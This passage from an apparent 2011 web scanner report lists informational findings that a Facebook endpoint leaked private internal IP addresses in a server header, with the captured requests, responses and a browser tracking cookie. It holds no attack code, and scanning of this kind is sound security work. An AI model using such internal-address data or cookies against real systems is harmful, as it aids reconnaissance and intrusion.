10.54.26.40

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2299b5cf4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff99472368%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.26.40
X-Cnection: close
Date: Thu, 16 Jun 2011 13:53:23 GMT

/*1308232403,171317800*/

window._ip_w["check4"] = 0;

19.55. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.118.40

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.118.40
X-Cnection: close
Date: Thu, 16 Jun 2011 15:31:30 GMT

/*1308238290,171341352*/

window._ip_w["check4"] = 0;

19.56. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.20.40

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.63.20.40
X-Cnection: close
Date: Thu, 16 Jun 2011 15:26:21 GMT

/*1308237981,171906088*/

window._ip_w["check4"] = 0;

19.57. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.36.55

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.36.55
X-Cnection: close
Date: Thu, 16 Jun 2011 14:13:59 GMT

/*1308233639,171320375*/

window._ip_w["check4"] = 0;

19.58. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.108.61

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.108.61
X-Cnection: close
Date: Thu, 16 Jun 2011 15:21:09 GMT

/*1308237669,171338813*/

window._ip_w["check4"] = 0;

19.59. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.238.52

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.238.52
X-Cnection: close
Date: Thu, 16 Jun 2011 16:49:02 GMT

/*1308242942,171896372*/

window._ip_w["check4"] = 0;

19.60. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.219.45

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.219.45
X-Cnection: close
Date: Thu, 16 Jun 2011 18:32:35 GMT

/*1308249155,171367213*/

window._ip_w["check4"] = 0;

19.61. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.166.119

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfa8396448%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1ed556998%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.136.166.119
X-Cnection: close
Date: Thu, 16 Jun 2011 13:17:16 GMT

/*1308230236,176727671*/

window._ip_w["check4"] = 0;

19.62. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.2.30

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2ebf3bf14%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2a9bfff6%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.63.2.30
X-Cnection: close
Date: Thu, 16 Jun 2011 15:52:11 GMT

/*1308239531,171901470*/

window._ip_w["check4"] = 0;

19.63. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.45.39

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.45.39
X-Cnection: close
Date: Thu, 16 Jun 2011 13:37:50 GMT

/*1308231470,171322663*/

window._ip_w["check4"] = 0;

19.64. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.181.46

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc1657c04%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff11698f0b4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.181.46
X-Cnection: close
Date: Thu, 16 Jun 2011 15:57:24 GMT

/*1308239844,171881774*/

window._ip_w["check4"] = 0;

19.65. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.123.32

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.123.32
X-Cnection: close
Date: Thu, 16 Jun 2011 12:04:42 GMT

/*1308225882,171342624*/

window._ip_w["check4"] = 0;

19.66. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.154.58

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.154.58
X-Cnection: close
Date: Thu, 16 Jun 2011 13:42:59 GMT

/*1308231779,171874874*/

window._ip_w["check4"] = 0;

19.67. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.130.41

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.43.130.41
X-Cnection: close
Date: Thu, 16 Jun 2011 11:25:07 GMT

/*1308223507,170623529*/

window._ip_w["check4"] = 0;

19.68. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.195.33

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df706975%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffee63f02c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.195.33
X-Cnection: close
Date: Thu, 16 Jun 2011 17:04:36 GMT

/*1308243876,171885345*/

window._ip_w["check4"] = 0;

19.69. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.89.58

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.89.58
X-Cnection: close
Date: Thu, 16 Jun 2011 17:30:27 GMT

/*1308245427,171333946*/

window._ip_w["check4"] = 0;

19.70. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.27.44

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3730c6874%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff16ec17f94%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.27.44
X-Cnection: close
Date: Thu, 16 Jun 2011 14:14:02 GMT

/*1308233642,171318060*/

window._ip_w["check4"] = 0;

19.71. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.111.34

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df29b2230e8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffbe2c2ba%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.111.34
X-Cnection: close
Date: Thu, 16 Jun 2011 13:37:53 GMT

/*1308231473,171339554*/

window._ip_w["check4"] = 0;

19.72. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.236.39

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.236.39
X-Cnection: close
Date: Thu, 16 Jun 2011 15:52:10 GMT

/*1308239530,171895847*/

window._ip_w["check4"] = 0;

19.73. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.210.63

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfb5c3e2ec%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff350bfd74%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.210.63
X-Cnection: close
Date: Thu, 16 Jun 2011 15:36:41 GMT

/*1308238601,171889215*/

window._ip_w["check4"] = 0;

19.74. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.222.40

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.62.222.40
X-Cnection: close
Date: Thu, 16 Jun 2011 13:12:05 GMT

/*1308229925,171892264*/

window._ip_w["check4"] = 0;

19.75. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.92.39

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3816cd8fc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2824c430%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.92.39
X-Cnection: close
Date: Thu, 16 Jun 2011 13:32:43 GMT

/*1308231163,171334695*/

window._ip_w["check4"] = 0;

19.76. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.152.34

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df775c6284%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff32940a098%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.152.34
X-Cnection: close
Date: Thu, 16 Jun 2011 14:24:23 GMT

/*1308234263,171350050*/

window._ip_w["check4"] = 0;

19.77. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.77.34

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.77.34
X-Cnection: close
Date: Thu, 16 Jun 2011 18:01:28 GMT

/*1308247288,171330850*/

window._ip_w["check4"] = 0;

19.78. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.117.31

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.117.31
X-Cnection: close
Date: Thu, 16 Jun 2011 15:41:49 GMT

/*1308238909,171341087*/

window._ip_w["check4"] = 0;

19.79. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.32.51

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-FB-Server: 10.54.32.51
X-Cnection: close
Date: Thu, 16 Jun 2011 14:29:29 GMT

/*1308234569,171319347*/

window._ip_w["check4"] = 0;

19.80. http://check4.facebook.com/ajax/v6.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://check4.facebook.com
Path:	/ajax/v6.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.91.63

Request

GET /ajax/v6.php?v=check4&pingonly=true HTTP/1.1
Host: check4.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df37cc8d578%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3d6a4ceb4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Content-Length: 53
Content-Type: application/x-javascript; charset=utf-8
Expires: Sat, 01 Jan 2000 00:00:00 GMT
